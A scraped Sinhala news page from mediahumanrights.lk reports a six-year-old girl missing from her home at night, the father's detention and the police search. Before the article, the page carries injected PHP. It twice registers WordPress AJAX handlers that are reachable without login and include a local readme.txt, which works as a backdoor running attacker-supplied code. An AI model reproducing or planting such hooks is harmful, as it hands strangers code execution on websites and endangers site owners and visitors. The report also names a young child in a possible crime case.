if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අම්මා හැර ගිය පසු තාත්තා සමඟ තනිවූ පුංචි දුවට වෙච්ච දෙයක් නෑ- මහ රෑ දැරිය මොර දුන් බව අසල් වැසියෝ කියති - mediahumanrights.lk
mediahumanrights.lk
Local News News

අම්මා හැර ගිය පසු තාත්තා සමඟ තනිවූ පුංචි දුවට වෙච්ච දෙයක් නෑ- මහ රෑ දැරිය මොර දුන් බව අසල් වැසියෝ කියති

දුම්මලසුරිය පොලිස් වසමට අයත් වැලිපැන්න ඉලිප්පගමුව  ග්‍රාමයේ ජිවත් වූ  වයස අවුරුදු හයක දැරියක් ඊයේ  ( 22 )
රාත්‍රියේ සිට අතුරුදන්ව  ඇති බවට දුම්මලසුරිය පොලිසියට පැමිණිල්ලක් ලැබී තිබේ .
මෙලෙස අතුරුදන්ව ඇත්තේ ශේනෂා  සිතුලිලි  නැමති දැරියකි . මේ දැරියගේ මව පියා හැර ගොස් ඇති අතර  දැරිය පියා සමග ජිවත්ව ඇත .
22  රාත්‍රී  08.30 ට පමණ අසල්වැසියෙකු විසින් මේ දැරිය අවසන් වරට දැක ඇති අතර දැරිය රාත්‍රී 10.30 ට පමණ
තාත්තේ ,තාත්තේ කියා මොර දුන් බව අසල්වැසියනට ඇසි ඇත.
දැරියගේ පියා  ඒ අවස්ථාවේ මත්පැන් පානය කර සිට
ඇති බවට මේ වන විට පොලිසියට තොරතුරු ලැබී තිබේ.
පියාට සිය  දියණිය නිවසේ නොමැති බව  දෑන ගැනීමට ලැබී ඇත්තේ අද (23) පෙරවරු අටට පමණය.
ඒ අවස්ථාවේම ඔහු විසින් පොලිස් හදිසි ඇමතුම් අංශයට මේ බව දැනුම් දී තිබේ. ඒ අනුව පොලිස් හදිසි ඇමතුම් අංශය දුම්මලසුරිය පොලිසියට මේ බව දැනුම්  දී ඇති අතර දුම්මලසුරිය පොලිසිය දැරියගේ පියා පොලිස් භාරයට ගෙන පරීක්ෂණ ආරම්භ කරන ලදී.
ඒ අනුව කුලියාපිටිය  විශේෂ විමර්ශන ඒකකයේ නිලධාරීන් හා පොලිස් සුනඛයන් ගෙන්වා පරීක්ෂණ සිදු කරන ලදී .
පොලිස් සුනඛයන් දැරියගේ ඇඳුමකට ඉව කර ප්‍රධාන මාර්ගය දක්වා ගොස් නතර වී ඇත. ඒ අනුව දැරිය වාහනයකින් පැහැර ගෙන යන්නට ඇතැයි පොලිසිය සැක පහල කරයි.
නිවස පිහිටි ගෙවත්තේ ඇති ළිඳද පොලිස් නිලධාරීන්ගේ පරික්ෂාවට ලක්විණි .
මේ දැරිය සිය පියාට දැඩි ආදරයකින් පසුව ඇති අතර පියා තමා යන ඕනෑම ස්ථානයකට දැරිය රැගෙන ගොස්  ඇත. ඒ අනුව අවසන් කාලයේ දැරිය
ළදරු පාසලට හෝ නොගොස් ඇති අතර දැරිය පියා සමග සිට ඇත .
දුම්මලසුරිය පොලිස් ස්ථානාධිපති ආර් .එම ජයවීර මහතාගේ උපදෙස් පරිදි දැරිය සෙවීම් සදහා පොලිස් කණ්ඩායම් කීපයක් පරීක්ෂණ ආරම්භ කර තිබේ .
(under the courtesy of adaderana.lk news web)

Related posts

විශ්‍රාමිකයින්ට දුම්රිය බලපත් ලබා ගැනීමේ විශේෂ ක්‍රමවේදයක් හෙට සිට

Shiran Viraj

මාලිංගගේ කඩුලූ ත්‍රිත්වය අපතේ යයි – විස්සයි විස්ස කුසලානයත් දෙකට බෙදෙයි

Shiran Viraj

සහල් මිල වේගයෙන් පහතට…

Shiran Viraj